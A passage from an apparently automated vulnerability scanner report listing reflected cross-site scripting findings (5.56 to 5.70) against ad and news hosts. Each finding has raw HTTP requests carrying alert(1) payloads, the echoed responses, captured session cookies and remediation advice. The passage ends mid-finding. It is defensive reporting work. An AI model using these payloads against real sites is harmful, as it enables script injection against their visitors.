This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The string is the argument of a document.write call, and the "-alert(1)-" form keeps that argument a valid expression, so alert(1) runs when the script is evaluated. The same template and the same injection apply to the type parameter and to arbitrary parameter names (5.56 and 5.57), since the whole query string is reflected into the iframe URL. Note also that this JavaScript response is served with Content-Type: text/html.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the iframe URL must be built from request parameters, the server should reconstruct it from a whitelist of known parameters (clicktrack in particular should be required to parse as an http or https URL) and emit the result as a JSON-encoded JavaScript literal, rather than reflecting the raw query string between quotation marks.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097677_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c23"-alert(1)-"d0a07ccec42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315097683_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3517f"-alert(1)-"f1d43df6b5a was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:35 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097675_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:35 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:35 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.58. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied unmodified into the response. The response is served as application/x-javascript and consists of a single // line comment, so the reflection point is a JavaScript comment rather than HTML text between tags. The payload c816f<script>alert(1)</script>a389a443772 was submitted in the ct parameter and was echoed unmodified.

This shows that no output encoding is applied. Inside a line comment the <script> markup is inert while the response is executed as a script; it would only be rendered as markup if a browser treated the response as an HTML document. The report does not show how a line terminator in the value is handled, which is the check that matters for this context.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:52 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied unmodified into the response, which, as in 5.58, is an application/x-javascript body consisting of a single // line comment rather than HTML text between tags. The payload 4ad85<script>alert(1)</script>5f200bad0a2 was submitted as the parameter name and was echoed unmodified.

As in 5.58, the markup is inert while the response runs as a script; what this confirms is that unknown parameter names are reflected into the error message without any encoding.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&4ad85<script>alert(1)</script>5f200bad0a2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:56 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 4ad85<script>alert(1)</script>5f200bad0a2

5.60. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied unmodified into the response, which, as in 5.58, is an application/x-javascript body consisting of a single // line comment rather than HTML text between tags. The payload ad4f4<script>alert(1)</script>7e2e605e666 was submitted in the tr parameter and was echoed unmodified.

As in 5.58, the markup is inert while the response runs as a script; the finding is that the section name is reflected into the error message without any encoding.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:53 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.www.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload acc3f%3balert(1)//8f546b5d95b was submitted in the callback parameter. This input was echoed as acc3f;alert(1)//8f546b5d95b in the application's response.

This proof-of-concept attack demonstrates that the callback name is emitted as bare JavaScript without validation, which is a direct script injection needing no quote or tag characters. Note that in this particular response the echoed ; falls inside the open parenthesis of if (typeof ..., so the script as shown is a syntax error and alert(1) does not run; any value that keeps the statement well-formed is evaluated as code.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. For a JSONP endpoint the callback name cannot be encoded away; it must be validated against a strict pattern (a dotted chain of JavaScript identifiers such as Reuters.tns.updateRecommendations) and the request rejected otherwise. The response should also carry X-Content-Type-Options: nosniff so that it is never interpreted as HTML.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationsacc3f%3balert(1)//8f546b5d95b&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097335859 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; __qseg=Q_D|Q_T; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:46 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:12:47 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b === 'function') {Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b([]);}

5.62. http://lingows.appspot.com/bubble/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into the response, which is served as text/javascript and consists of a JSONP call, LINGO.connect.respond({...}). The value lands inside the double-quoted JSON string for the "key" member, not between HTML tags. The payload 32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf was submitted in the request_id parameter and was echoed as 32dc1<img src=a onerror=alert(1)>26594ea95cf.

This shows that < and > are not escaped in the JSON output. While the response runs as a script the markup sits inside a string literal and does nothing; the event handler would fire only if a browser rendered this response as an HTML document (the response sets no X-Content-Type-Options: nosniff header). The report does not show whether a double quotation mark or backslash in the value is escaped, which is what would decide whether the string literal itself can be terminated.

Request

GET /bubble/?request_id=3_Sacbee32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf&respond_path=LINGO.connect&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:29 GMT
Server: Google Frontend
Content-Length: 108

LINGO.connect.respond( {"status": "retry", "key": "3_Sacbee32dc1<img src=a onerror=alert(1)>26594ea95cf"} );

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is copied into the response as the bare callback expression of a JSONP call, immediately followed by .respond( ... ), and is not encapsulated in quotation marks. The payload 35685<script>alert(1)</script>490b8d7a6b2 was submitted in the respond_path parameter and was echoed unmodified.

This is the same unquoted JavaScript expression context as the callback parameter in 5.61, not HTML text between tags: the response is served as text/javascript. The <script> markup turns the response as shown into a JavaScript syntax error rather than running, but since whatever is supplied here is evaluated as code, a value that is itself valid JavaScript would execute; the fix is to validate the callback name, not to encode it.

Request

GET /bubble/?request_id=3_Sacbee&respond_path=LINGO.connect35685<script>alert(1)</script>490b8d7a6b2&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:53 GMT
Server: Google Frontend
Content-Length: 105

LINGO.connect35685<script>alert(1)</script>490b8d7a6b2.respond( {"status": "retry", "key": "3_Sacbee"} );

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the request_id request parameter is copied into the double-quoted JSON string for the "key" member of the JSONP call in a text/javascript response, the same context as 5.62 and not HTML text between tags. The payload 9722d<script>alert(1)</script>4b38a362dd7 was submitted in the request_id parameter and was echoed unmodified.

As in 5.62, this shows that < and > are not escaped in the JSON output; the markup is inert while the response runs as a script and could only render if the response were treated as an HTML document.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7&respond_path=LINGO.connect&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5905
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:38 GMT
Server: Google Frontend
Content-Length: 15633

LINGO.connect.respond( {"key": "LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the respond_path request parameter is copied into the response as the bare callback expression of a JSONP call, immediately followed by .respond( ... ), and is not encapsulated in quotation marks. The payload fbbff<script>alert(1)</script>1d4f5de5d1c was submitted in the respond_path parameter and was echoed unmodified.

Same context and same caveat as 5.63: the response is text/javascript, the <script> markup makes it a syntax error as shown, and the exposure is that any value supplied here is evaluated as JavaScript, so the fix is validation of the callback name rather than encoding.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN&respond_path=fbbff<script>alert(1)</script>1d4f5de5d1c&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5882
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:08:01 GMT
Server: Google Frontend
Content-Length: 15620

fbbff<script>alert(1)</script>1d4f5de5d1c.respond( {"key": "LSXLXVUXQN", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the request_id request parameter is copied into the double-quoted JSON string for the "key" member of the JSONP call in a text/javascript response, the same context as 5.62 and not HTML text between tags. The payload 16238<script>alert(1)</script>fe8c9be795c was submitted in the request_id parameter and was echoed unmodified.

As in 5.62, this shows that < and > are not escaped in the JSON output; the markup is inert while the response runs as a script and could only render if the response were treated as an HTML document.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c&respond_path=LINGO.connect&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5917
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:24 GMT
Server: Google Frontend
Content-Length: 18823

LINGO.connect.respond( {"key": "ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the respond_path request parameter is copied into the response as the bare callback expression of a JSONP call, immediately followed by .respond( ... ), and is not encapsulated in quotation marks. The payload 56500<script>alert(1)</script>339401737d was submitted in the respond_path parameter and was echoed unmodified.

Same context and same caveat as 5.63: the response is text/javascript, the <script> markup makes it a syntax error as shown, and the exposure is that any value supplied here is evaluated as JavaScript, so the fix is validation of the callback name rather than encoding.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV&respond_path=LINGO.connect56500<script>alert(1)</script>339401737d&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5894
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:46 GMT
Server: Google Frontend
Content-Length: 18822

LINGO.connect56500<script>alert(1)</script>339401737d.respond( {"key": "ZXANLLFMOV", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d5c"><script>alert(1)</script>31deefb90e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac/1726311578/Bottom3/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2b6"><script>alert(1)</script>5b6781c6a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom36d2b6"><script>alert(1)</script>5b6781c6a22 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/664256000/Bottom36d2b6"><script>alert(1)</script>5b6781c6a22/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 69220<script>alert(1)</script>530070fbb12 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

